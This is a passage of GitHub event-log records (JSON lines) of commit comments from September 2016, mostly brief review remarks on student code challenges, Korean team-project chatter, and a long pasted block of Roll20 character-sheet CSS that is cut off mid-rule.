{"id":"4621822724","type":"CommitCommentEvent","actor":{"login":"dksxodus12"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184460,"position":null,"line":null,"path":null,"commit_id":"e85489327e1a08f0be6eee5f0f1a52f2d8987a64","created_at":"2016-09-27T03:51:09Z","updated_at":"2016-09-27T03:51:09Z","body":"preview"}},"created_at":"2016-09-27T03:51:09Z"}
{"id":"4621823755","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19184461,"position":null,"line":null,"path":null,"commit_id":"e57b044b01d5c22b2211c5f8214b1c8f36c92e32","created_at":"2016-09-27T03:51:36Z","updated_at":"2016-09-27T03:51:36Z","body":"."}},"created_at":"2016-09-27T03:51:36Z"}
{"id":"4621823872","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19184462,"position":null,"line":null,"path":null,"commit_id":"f017a1f637c02c34d7eef28fb48691e5617a6d91","created_at":"2016-09-27T03:51:39Z","updated_at":"2016-09-27T03:51:39Z","body":"잘봤습니다."}},"created_at":"2016-09-27T03:51:39Z"}
{"id":"4621824427","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19184464,"position":null,"line":null,"path":null,"commit_id":"9fe997fd8f8286391452dae561e871de033747d0","created_at":"2016-09-27T03:51:52Z","updated_at":"2016-09-27T03:51:52Z","body":"잘봤습니다. "}},"created_at":"2016-09-27T03:51:52Z"}
{"id":"4621824453","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"StPaulStylee/rho_code_challenge_1"},"payload":{"comment":{"id":19184465,"position":4,"line":11,"path":"2-loops/all_your_loops.js","commit_id":"f5a5c6772c928893699c0364e980012b9414cd72","created_at":"2016-09-27T03:51:53Z","updated_at":"2016-09-27T03:51:53Z","body":"If the `loopFor` function is called first, the loopWhile function will run 6 times. These questions didn't necessarily require you to wrap the loops in functions."}},"created_at":"2016-09-27T03:51:53Z"}
{"id":"4621825372","type":"CommitCommentEvent","actor":{"login":"obscenesensi"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184466,"position":null,"line":null,"path":null,"commit_id":"70c4facfb463ec77a8434b3778052b0d0c146902","created_at":"2016-09-27T03:52:15Z","updated_at":"2016-09-27T03:52:15Z","body":"thx"}},"created_at":"2016-09-27T03:52:15Z"}
{"id":"4621825715","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19184468,"position":null,"line":null,"path":null,"commit_id":"20645fdda9ec16c142e268a8c4ac6f48dd21f803","created_at":"2016-09-27T03:52:23Z","updated_at":"2016-09-27T03:52:23Z","body":"락 걸려있네요."}},"created_at":"2016-09-27T03:52:23Z"}
{"id":"4621826048","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19184470,"position":null,"line":null,"path":null,"commit_id":"325b55099aa7f566042fbcbf7cc285f2dc6b9aa8","created_at":"2016-09-27T03:52:30Z","updated_at":"2016-09-27T03:52:30Z","body":"락 ..?"}},"created_at":"2016-09-27T03:52:30Z"}
{"id":"4621826132","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"StPaulStylee/rho_code_challenge_1"},"payload":{"comment":{"id":19184471,"position":5,"line":16,"path":"3-conditionals/if.js","commit_id":"f5a5c6772c928893699c0364e980012b9414cd72","created_at":"2016-09-27T03:52:32Z","updated_at":"2016-09-27T03:52:32Z","body":"These questions also didn't necessarily require you to wrap the conditional statements in functions, although here it doesn't hurt anything. "}},"created_at":"2016-09-27T03:52:32Z"}
{"id":"4621829627","type":"CommitCommentEvent","actor":{"login":"dksxodus12"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184480,"position":null,"line":null,"path":null,"commit_id":"70c4facfb463ec77a8434b3778052b0d0c146902","created_at":"2016-09-27T03:53:55Z","updated_at":"2016-09-27T03:53:55Z","body":"thxx\r\n"}},"created_at":"2016-09-27T03:53:55Z"}
{"id":"4621829923","type":"CommitCommentEvent","actor":{"login":"firewall0118"},"repo":{"name":"firewall0118/wmveposit"},"payload":{"comment":{"id":19184483,"position":null,"line":null,"path":null,"commit_id":"66bddf50f310c9bf33e035716718237ec31b863f","created_at":"2016-09-27T03:54:01Z","updated_at":"2016-09-27T03:54:01Z","body":"Initial Comment"}},"created_at":"2016-09-27T03:54:01Z"}
{"id":"4621830816","type":"CommitCommentEvent","actor":{"login":"kendrahavens"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":19184485,"position":null,"line":null,"path":null,"commit_id":"9ff8553857e3ac1f298662741bea90af9adccb88","created_at":"2016-09-27T03:54:25Z","updated_at":"2016-09-27T03:54:25Z","body":"This is great! Thank you for making it much clearer. 👍 "}},"created_at":"2016-09-27T03:54:25Z"}
{"id":"4621831139","type":"CommitCommentEvent","actor":{"login":"simvery"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19184487,"position":null,"line":null,"path":null,"commit_id":"b593fa2411f9eff353be05593c9525f45bc75a6e","created_at":"2016-09-27T03:54:33Z","updated_at":"2016-09-27T03:54:33Z","body":"..."}},"created_at":"2016-09-27T03:54:33Z"}
{"id":"4621831447","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19184488,"position":null,"line":null,"path":null,"commit_id":"b593fa2411f9eff353be05593c9525f45bc75a6e","created_at":"2016-09-27T03:54:41Z","updated_at":"2016-09-27T03:54:41Z","body":"어려워요"}},"created_at":"2016-09-27T03:54:41Z"}
{"id":"4621832449","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"pathiniker/rho_code_challenge_1"},"payload":{"comment":{"id":19184490,"position":13,"line":16,"path":"2-loops/all_your_loops.js","commit_id":"01292683e680304de02fef8938b7a7ac4fd58737","created_at":"2016-09-27T03:55:10Z","updated_at":"2016-09-27T03:55:10Z","body":"Be sure to reset `i=0` or this loop won't ever execute."}},"created_at":"2016-09-27T03:55:10Z"}
{"id":"4621832855","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19184491,"position":null,"line":null,"path":null,"commit_id":"cae579d6cbcff686049c2d865387651b21379b7f","created_at":"2016-09-27T03:55:19Z","updated_at":"2016-09-27T03:55:19Z","body":"good source"}},"created_at":"2016-09-27T03:55:19Z"}
{"id":"4621832980","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19184493,"position":null,"line":null,"path":null,"commit_id":"182f4b3bd75c39183ebd699c3fa42cb8a609cc39","created_at":"2016-09-27T03:55:21Z","updated_at":"2016-09-27T03:55:21Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-27T03:55:21Z"}
{"id":"4621833053","type":"CommitCommentEvent","actor":{"login":"LarryAsante"},"repo":{"name":"GrinnellAppDev/Publications-Android"},"payload":{"comment":{"id":19184495,"position":null,"line":null,"path":null,"commit_id":"78a334c9d4f8a9bfd69eec5954c2f5ca5150fde3","created_at":"2016-09-27T03:55:23Z","updated_at":"2016-09-27T03:55:23Z","body":"This commit features:\r\n* Bump to build version\r\n* Accurate references to `UserInterface.java` after re-packaging PR was merged\r\n* a compilable and working version of the develop branch"}},"created_at":"2016-09-27T03:55:23Z"}
{"id":"4621833130","type":"CommitCommentEvent","actor":{"login":"dksxodus12"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184496,"position":16,"line":16,"path":"sortsort","commit_id":"637d93cb91a393a270aff9d18e082e2f082b2bef","created_at":"2016-09-27T03:55:26Z","updated_at":"2016-09-27T03:55:26Z","body":"get_pivot?\r\n"}},"created_at":"2016-09-27T03:55:26Z"}
{"id":"4621833741","type":"CommitCommentEvent","actor":{"login":"imakarov"},"repo":{"name":"cscart/addon-default-secondary-currency"},"payload":{"comment":{"id":19184498,"position":1,"line":7,"path":"app/addons/default_secondary_currency/addon.xml","commit_id":"64ebcec95d5b76f256707f4ae9f210201f729bfd","created_at":"2016-09-27T03:55:41Z","updated_at":"2016-09-27T03:55:41Z","body":"@aurangel Описание надо писать в lower case. т.е. должно быть \r\nSet the secondary currency to be selected by default in the storefront.\r\n"}},"created_at":"2016-09-27T03:55:41Z"}
{"id":"4621835436","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"pathiniker/rho_code_challenge_1"},"payload":{"comment":{"id":19184503,"position":18,"line":19,"path":"4-arrays/builtins.js","commit_id":"01292683e680304de02fef8938b7a7ac4fd58737","created_at":"2016-09-27T03:56:22Z","updated_at":"2016-09-27T03:56:22Z","body":"This is a tricky one, a possible solution is \r\n\r\n```JS\r\nvar newArr = arr.map(function(element) {\r\n  return element / 2;\r\n});\r\n```"}},"created_at":"2016-09-27T03:56:22Z"}
{"id":"4621836574","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"mauro3/Parameters.jl"},"payload":{"comment":{"id":19184515,"position":8,"line":8,"path":".travis.yml","commit_id":"1e4129ec2774c1c99c9ed1ca9b57dedffc8ef64f","created_at":"2016-09-27T03:56:51Z","updated_at":"2016-09-27T03:56:51Z","body":"https://github.com/JuliaGeo/Proj4.jl/pull/11#discussion_r80205460"}},"created_at":"2016-09-27T03:56:51Z"}
{"id":"4621837543","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19184516,"position":1,"line":1,"path":"stack_reverse","commit_id":"b593fa2411f9eff353be05593c9525f45bc75a6e","created_at":"2016-09-27T03:57:17Z","updated_at":"2016-09-27T03:57:17Z","body":".."}},"created_at":"2016-09-27T03:57:17Z"}
{"id":"4621838128","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"pathiniker/rho_code_challenge_1"},"payload":{"comment":{"id":19184518,"position":19,"line":19,"path":"5-functions/func.js","commit_id":"01292683e680304de02fef8938b7a7ac4fd58737","created_at":"2016-09-27T03:57:32Z","updated_at":"2016-09-27T03:57:32Z","body":"Good start on this section. This one can be written as \r\n\r\n```JS\r\nvar log = function(anything) {\r\n  console.log(anything);\r\n}\r\n```"}},"created_at":"2016-09-27T03:57:32Z"}
{"id":"4621838246","type":"CommitCommentEvent","actor":{"login":"obscenesensi"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184519,"position":null,"line":null,"path":null,"commit_id":"310bcb462517682094c04ddc92bbe4ff25396dd0","created_at":"2016-09-27T03:57:35Z","updated_at":"2016-09-27T03:57:35Z","body":":)"}},"created_at":"2016-09-27T03:57:35Z"}
{"id":"4621838293","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"mauro3/Parameters.jl"},"payload":{"comment":{"id":19184520,"position":8,"line":8,"path":".travis.yml","commit_id":"1e4129ec2774c1c99c9ed1ca9b57dedffc8ef64f","created_at":"2016-09-27T03:57:36Z","updated_at":"2016-09-27T03:57:36Z","body":"nevermind you already got it"}},"created_at":"2016-09-27T03:57:36Z"}
{"id":"4621839402","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19184521,"position":null,"line":null,"path":null,"commit_id":"c8bfc7355ac2aa921e1d195233fb67ef84ec0e71","created_at":"2016-09-27T03:58:07Z","updated_at":"2016-09-27T03:58:07Z","body":"Tks for this working! I'll try test."}},"created_at":"2016-09-27T03:58:07Z"}
{"id":"4621845342","type":"CommitCommentEvent","actor":{"login":"MikeFu"},"repo":{"name":"MikeFu/crm"},"payload":{"comment":{"id":19184535,"position":null,"line":null,"path":null,"commit_id":"9aee87f60ad80d1f6faf528e8c445e8336d49cbd","created_at":"2016-09-27T04:00:26Z","updated_at":"2016-09-27T04:00:26Z","body":"test"}},"created_at":"2016-09-27T04:00:26Z"}
{"id":"4621845665","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19184536,"position":4,"line":124,"path":"src/Drivers/reko.config","commit_id":"048fd2c77498e729dbe206876e9324cec92bd94e","created_at":"2016-09-27T04:00:33Z","updated_at":"2016-09-27T04:00:33Z","body":"This no file with `msvcrt2.xml` name. Is it mistake?"}},"created_at":"2016-09-27T04:00:33Z"}
{"id":"4621846497","type":"CommitCommentEvent","actor":{"login":"seongminleeeee"},"repo":{"name":"seongminleeeee/inClassOne"},"payload":{"comment":{"id":19184538,"position":null,"line":null,"path":null,"commit_id":"aea314b1cc02ab0d1d96d21d6ff798895a372ff7","created_at":"2016-09-27T04:00:50Z","updated_at":"2016-09-27T04:00:50Z","body":"@matty-digital"}},"created_at":"2016-09-27T04:00:50Z"}
{"id":"4621852770","type":"CommitCommentEvent","actor":{"login":"sajidsrt"},"repo":{"name":"IITDU-Amit/project-seat-planning"},"payload":{"comment":{"id":19184555,"position":null,"line":null,"path":null,"commit_id":"293ee1f88ed8fbe4a999420a86d6830d47b81056","created_at":"2016-09-27T04:03:26Z","updated_at":"2016-09-27T04:03:26Z","body":"bbnb"}},"created_at":"2016-09-27T04:03:26Z"}
{"id":"4621865219","type":"CommitCommentEvent","actor":{"login":"ZHENGRex"},"repo":{"name":"rexfrommars/SERLER_production"},"payload":{"comment":{"id":19184598,"position":null,"line":null,"path":null,"commit_id":"abbdb7ef4ffd972f3bd4c0eeb12c7b213e53ba5a","created_at":"2016-09-27T04:08:31Z","updated_at":"2016-09-27T04:08:31Z","body":"@rexfrommars plz have a review of this cucumber test."}},"created_at":"2016-09-27T04:08:31Z"}
{"id":"4621866678","type":"CommitCommentEvent","actor":{"login":"dksxodus12"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184601,"position":null,"line":null,"path":null,"commit_id":"e85489327e1a08f0be6eee5f0f1a52f2d8987a64","created_at":"2016-09-27T04:09:10Z","updated_at":"2016-09-27T04:09:10Z","body":"dsad"}},"created_at":"2016-09-27T04:09:10Z"}
{"id":"4621870124","type":"CommitCommentEvent","actor":{"login":"namheekim"},"repo":{"name":"KimHyeongSeon/WOWProject"},"payload":{"comment":{"id":19184611,"position":null,"line":null,"path":null,"commit_id":"e7f222a1b633cfbed0c74772d952a94591da3a07","created_at":"2016-09-27T04:10:45Z","updated_at":"2016-09-27T04:10:45Z","body":"이렇게 하면 될까요?..."}},"created_at":"2016-09-27T04:10:45Z"}
{"id":"4621871798","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184615,"position":14,"line":13,"path":"lib/nemestats_client.ex","commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T04:11:31Z","updated_at":"2016-09-27T04:11:31Z","body":"Minor note: This can be replaced with `JSX.decode(response, [{:labels, :atom}])`"}},"created_at":"2016-09-27T04:11:31Z"}
{"id":"4621873294","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184617,"position":15,"line":14,"path":"lib/nemestats_client.ex","commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T04:12:14Z","updated_at":"2016-09-27T04:12:14Z","body":"Minor note: This can be replaced with `JSX.decode(response, [{:labels, :atom}])`"}},"created_at":"2016-09-27T04:12:14Z"}
{"id":"4621876340","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184623,"position":16,"line":32,"path":"mix.exs","commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T04:13:33Z","updated_at":"2016-09-27T04:13:33Z","body":"Should we keep exjsx? We could use Poison, which appears to pride itself on speed"}},"created_at":"2016-09-27T04:13:33Z"}
{"id":"4621880919","type":"CommitCommentEvent","actor":{"login":"sunsys0"},"repo":{"name":"Instamojo/Instamojo-OpenCart-2.0"},"payload":{"comment":{"id":19184634,"position":null,"line":null,"path":null,"commit_id":"485c369459802990b60da1cbe4f67a1dee4ef8d0","created_at":"2016-09-27T04:15:28Z","updated_at":"2016-09-27T04:15:28Z","body":"Ashwini, This new extension version is not working, I have generated both new ids as required and the module installs ok but when I press the \"Confirm Order\" button on the checkout then nothing happens, it does not go to the instamojo payment page. so I had to reinstall the old version again and it works ok, there seems to be some problem with the new version, please advice what to do ?.\r\nThanks/Rajeev"}},"created_at":"2016-09-27T04:15:28Z"}
{"id":"4621884838","type":"CommitCommentEvent","actor":{"login":"ccflack"},"repo":{"name":"ccflack/w1d1-make-a-page"},"payload":{"comment":{"id":19184648,"position":null,"line":null,"path":null,"commit_id":"31f7061cc771a2fad9e9524663947e833ad35b62","created_at":"2016-09-27T04:16:55Z","updated_at":"2016-09-27T04:16:55Z","body":"Revert to the messy \"Probably Finished\" version"}},"created_at":"2016-09-27T04:16:55Z"}
{"id":"4621889217","type":"CommitCommentEvent","actor":{"login":"SELAMMENGESHAA"},"repo":{"name":"rahelh/Group_4"},"payload":{"comment":{"id":19184651,"position":null,"line":null,"path":null,"commit_id":"498e523c668b6217dba03f26f72056e3d7786f40","created_at":"2016-09-27T04:18:45Z","updated_at":"2016-09-27T04:18:45Z","body":"I hope this Auto insurance will be profitable for the company cause of what we are doing to help them do their business efficiently with good performance."}},"created_at":"2016-09-27T04:18:45Z"}
{"id":"4621894684","type":"CommitCommentEvent","actor":{"login":"KD8EYF"},"repo":{"name":"gopher2/glinetpineapple"},"payload":{"comment":{"id":19184669,"position":null,"line":null,"path":null,"commit_id":"a0b89de9d5fe3ba5d61d4f4f091827380b458b53","created_at":"2016-09-27T04:20:56Z","updated_at":"2016-09-27T04:20:56Z","body":"not sure why you need to update the modules? I compiled the modules into the kernel. You don't even need to modprobe or insmod. is yours not being detected?"}},"created_at":"2016-09-27T04:20:56Z"}
{"id":"4621898902","type":"CommitCommentEvent","actor":{"login":"jsotuyod"},"repo":{"name":"pmd/pmd"},"payload":{"comment":{"id":19184676,"position":null,"line":null,"path":null,"commit_id":"aec40ec20ca1fb55c0511ef421b5df5f5680ca78","created_at":"2016-09-27T04:22:51Z","updated_at":"2016-09-27T04:22:51Z","body":"Wow! Huge mistake from me. Awesome you saw this! "}},"created_at":"2016-09-27T04:22:51Z"}
{"id":"4621899066","type":"CommitCommentEvent","actor":{"login":"GodenYao"},"repo":{"name":"apache/incubator-hawq"},"payload":{"comment":{"id":19184677,"position":null,"line":null,"path":null,"commit_id":"9b7f90b744850ff83769c3a46e6d4daeb109cc68","created_at":"2016-09-27T04:22:56Z","updated_at":"2016-09-27T04:22:56Z","body":"why change the folder path? "}},"created_at":"2016-09-27T04:22:56Z"}
{"id":"4621903926","type":"CommitCommentEvent","actor":{"login":"sansanichfb"},"repo":{"name":"apache/incubator-hawq"},"payload":{"comment":{"id":19184685,"position":null,"line":null,"path":null,"commit_id":"9b7f90b744850ff83769c3a46e6d4daeb109cc68","created_at":"2016-09-27T04:25:04Z","updated_at":"2016-09-27T04:25:04Z","body":"@GodenYao I moved pre- and post- install scripts to virtual rpm section so I moved scripts respectively. "}},"created_at":"2016-09-27T04:25:04Z"}
{"id":"4621903944","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19184686,"position":null,"line":null,"path":null,"commit_id":"c7068370dba15e66cb744fa8e030c8e73c2f69fb","created_at":"2016-09-27T04:25:05Z","updated_at":"2016-09-27T04:25:05Z","body":"高速打印机正在打印：轻量级J2EE企业应用实战\r\n高速打印机正在打印：Struts2权威指南"}},"created_at":"2016-09-27T04:25:05Z"}
{"id":"4621908565","type":"CommitCommentEvent","actor":{"login":"JustTeaForMe"},"repo":{"name":"Roll20/roll20-character-sheets"},"payload":{"comment":{"id":19184705,"position":null,"line":null,"path":null,"commit_id":"6a504172535a1d6970fbac7cd6398490ce8d2feb","created_at":"2016-09-27T04:27:05Z","updated_at":"2016-09-27T04:27:05Z","body":"/*---------------------------World Of Darkness Humanity Points CSS------------*/\r\ninput[type=\"radio\"].sheet-Hbut{\r\n    padding: 0px 0px 0px 0px;\r\n    margin: 5px 8px 0px -15px;\r\n    float: right;\r\n}\r\ninput.sheet-Hbut:checked + span::before {\r\n    opacity: 1;\r\n}\r\ninput.sheet-Hbut:hover + span::before {\r\n    opacity: 1;\r\n}\r\ninput.sheet-Hbut + span::before {\r\n    margin: 5px -7px 0px 0px;\r\n    width: 14px;\r\n    height: 14px;\r\n    font-size: 14px;\r\n    font-weight: bold;\r\n    opacity: .25;\r\n    float: right;\r\n    \r\n    -moz-border-radius: 0%;\r\n    -webkit-border-radius: 0%;\r\n    border-radius: 0%;\r\n    \r\n    background: #f6f6f6;\r\n    background: -moz-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -webkit-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -ms-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -o-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: radial-gradient(#f6f6f6, #dfdfdf);\r\n}\r\ninput.sheet-Hbut1 + span::before {\r\n    content: \"-1\";\r\n}\r\ninput.sheet-Hbut2 + span::before {\r\n    content: \"-2\";\r\n}\r\ninput.sheet-Hbut5 + span::before {\r\n    content: \"-5\";\r\n}\r\ninput.sheet-HbutI + span::before {\r\n    content: \"✖\";\r\n}\r\n\r\ndiv.sheet-res{\r\n    margin:0px 0px 0px 0px;\r\n    line-height: 20px;\r\n    font-weight: bold;\r\n    font-size: 14px;\r\n    text-align: left;\r\n}\r\ninput.sheet-resspec{\r\n    height: 20px;\r\n    width: 35%;\r\n    float: right;\r\n}\r\n\r\ninput.sheet-used+span::before {\r\n    content: \"✖\";\r\n    width: 12px;\r\n    height: 12px;\r\n    font-size: 12px;\r\n    \r\n    -moz-border-radius: 0%;\r\n    -webkit-border-radius: 0%;\r\n    border-radius: 0%;\r\n    \r\n    background: #f6f6f6;\r\n    background: -moz-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -webkit-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -ms-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -o-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: radial-gradient(#f6f6f6, #dfdfdf);\r\n}\r\n\r\ninput.sheet-zero:checked + span::before {\r\n    opacity: 0;\r\n}\r\ninput.sheet-zero:hover + span::before {\r\n    opacity: 1;\r\n}\r\ninput.sheet-zero + span::before {\r\n    opacity: .25;\r\n    font-size: 12px;\r\n    content: \"✖\";\r\n    \r\n    background: #f6f6f6;\r\n    background: -moz-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -webkit-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -ms-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: -o-radial-gradient(#f6f6f6, #dfdfdf);\r\n    background: radial-gradient(#f6f6f6, #dfdfdf);\r\n}\r\n\r\ndiv.sheet-name {\r\n    width: 100px;\r\n    padding-left: 10px;\r\n}\r\ndiv.sheet-dots {\r\n    width: 160px;\r\n    text-align: right;\r\n}\r\n\r\nselect.sheet-DP{\r\n    margin: 0px 0px 1px 0px;\r\n    padding: 0px 0px 0px 0px;\r\n    width: 43%;\r\n}\r\nbutton.sheet-DP{\r\n    height: 20px;\r\n    width: 8%;\r\n}\r\ninput.sheet-DPspace{\r\n    opacity: 0;\r\n    width: 23%;\r\n}\r\n\r\ndiv.sheet-qdot {\r\n    margin: -95px 0px 0px -175px;\r\n    font-size:20px;\r\n}\r\n\r\nselect.sheet-wheel{\r\n    width: 20px;\r\n    \r\n    -webkit-appearance: none;\r\n    -moz-appearance: none;\r\n    appearance: none;\r\n}\r\n\r\nselect.sheet-top  { margin-top:-60px; }\r\nselect.sheet-mid-eighth { margin-top: -45px; }\r\nselect.sheet-mid-quarter { margin-top: -20px; }\r\nselect.sheet-mid-three-eighth { margin-top: 17px; }\r\nselect.sheet-middle { margin-top: 60px; }\r\n\r\nselect.sheet-middle-2 { margin-top: -58px; }\r\nselect.sheet-mid-five-eighth { margin-top: -13px; }\r\nselect.sheet-mid-three-quarter { margin-top: 27px; }\r\nselect.sheet-mid-seven-eighth { margin-top: 55px; }\r\nselect.sheet-bottom { margin-top: 68px; }\r\n\r\nselect.sheet-left-1 { margin-left: 0px; }\r\nselect.sheet-left-2 { margin-left: -16px; }\r\nselect.sheet-left-3 { margin-left: -10px; }\r\nselect.sheet-left-4 { margin-left: -6px; }\r\nselect.sheet-left-5 { margin-left: -3px; }\r\nselect.sheet-left-6 { margin-left: -1px; }\r\nselect.sheet-left-7 { margin-left: -3px; }\r\nselect.sheet-left-8 { margin-left: -6px; }\r\nselect.sheet-left-9 { margin-left: -10px; }\r\nselect.sheet-left-10 { margin-left: -16px; }\r\n\r\nselect.sheet-wheel9{\r\n    transform:rotate(9deg);\r\n    -ms-transform:rotate(9deg); /* IE 9 */\r\n    -webkit-transform:rotate(9deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel27{\r\n    transform:rotate(27deg);\r\n    -ms-transform:rotate(27deg); /* IE 9 */\r\n    -webkit-transform:rotate(27deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel45{\r\n    transform:rotate(45deg);\r\n    -ms-transform:rotate(45deg); /* IE 9 */\r\n    -webkit-transform:rotate(45deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel63{\r\n    transform:rotate(63deg);\r\n    -ms-transform:rotate(63deg); /* IE 9 */\r\n    -webkit-transform:rotate(63deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel81{\r\n    transform:rotate(81deg);\r\n    -ms-transform:rotate(81deg); /* IE 9 */\r\n    -webkit-transform:rotate(81deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel99{\r\n    transform:rotate(99deg);\r\n    -ms-transform:rotate(99deg); /* IE 9 */\r\n    -webkit-transform:rotate(99deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel117{\r\n    transform:rotate(117deg);\r\n    -ms-transform:rotate(117deg); /* IE 9 */\r\n    -webkit-transform:rotate(117deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel135{\r\n    transform:rotate(135deg);\r\n    -ms-transform:rotate(135deg); /* IE 9 */\r\n    -webkit-transform:rotate(135deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel153{\r\n    transform:rotate(153deg);\r\n    -ms-transform:rotate(153deg); /* IE 9 */\r\n    -webkit-transform:rotate(153deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheel171{\r\n    transform:rotate(171deg);\r\n    -ms-transform:rotate(171deg); /* IE 9 */\r\n    -webkit-transform:rotate(171deg); /* Opera, Chrome, and Safari */\r\n}\r\n\r\nselect.sheet-wheeln9{\r\n    transform:rotate(-9deg);\r\n    -ms-transform:rotate(-9deg); /* IE 9 */\r\n    -webkit-transform:rotate(-9deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln27{\r\n    transform:rotate(-27deg);\r\n    -ms-transform:rotate(-27deg); /* IE 9 */\r\n    -webkit-transform:rotate(-27deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln45{\r\n    transform:rotate(-45deg);\r\n    -ms-transform:rotate(-45deg); /* IE 9 */\r\n    -webkit-transform:rotate(-45deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln63{\r\n    transform:rotate(-63deg);\r\n    -ms-transform:rotate(-63deg); /* IE 9 */\r\n    -webkit-transform:rotate(-63deg); /* Opera, Chrome, and Safari */\r\n}\r\n\r\nselect.sheet-wheeln81{\r\n    transform:rotate(-81deg);\r\n    -ms-transform:rotate(-81deg); /* IE 9 */\r\n    -webkit-transform:rotate(-81deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln99{\r\n    transform:rotate(-99deg);\r\n    -ms-transform:rotate(-99deg); /* IE 9 */\r\n    -webkit-transform:rotate(-99deg); /* Opera, Chrome, and Safari */\r\n}\r\n\r\nselect.sheet-wheeln117{\r\n    transform:rotate(-117deg);\r\n    -ms-transform:rotate(-117deg); /* IE 9 */\r\n    -webkit-transform:rotate(-117deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln135{\r\n    transform:rotate(-135deg);\r\n    -ms-transform:rotate(-135deg); /* IE 9 */\r\n    -webkit-transform:rotate(-135deg); /* Opera, Chrome, and Safari */\r\n}\r\n\r\nselect.sheet-wheeln153{\r\n    transform:rotate(-153deg);\r\n    -ms-transform:rotate(-153deg); /* IE 9 */\r\n    -webkit-transform:rotate(-153deg); /* Opera, Chrome, and Safari */\r\n}\r\nselect.sheet-wheeln171{\r\n    transform:rotate(-171deg);\r\n    -ms-transform:rotate(-171deg); /* IE 9 */\r\n    -webkit-transform:rotate(-171deg); /* Opera, Chrome, and Safari */\r\n}\r\n/*---------------------------D20 Modern Custom Character Sheet CSS------------*/\r\n\r\n/*---------------------------Repeating Blocks---------------------------------*/\r\n.charsheet .repcontrol_add {\r\n    display: block;\r\n    background:#7F2108;\r\n    color:white;\r\n    text-shadow:0px 0px 2px #000,0px 0px 2px #000,0px 0px 2px #000;\r\n    box-shadow:none;\r\n    float:left!important;\r\n    